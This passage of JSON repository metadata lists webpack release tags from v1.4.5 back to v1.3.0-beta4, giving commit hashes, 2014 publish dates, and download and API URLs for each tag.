},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@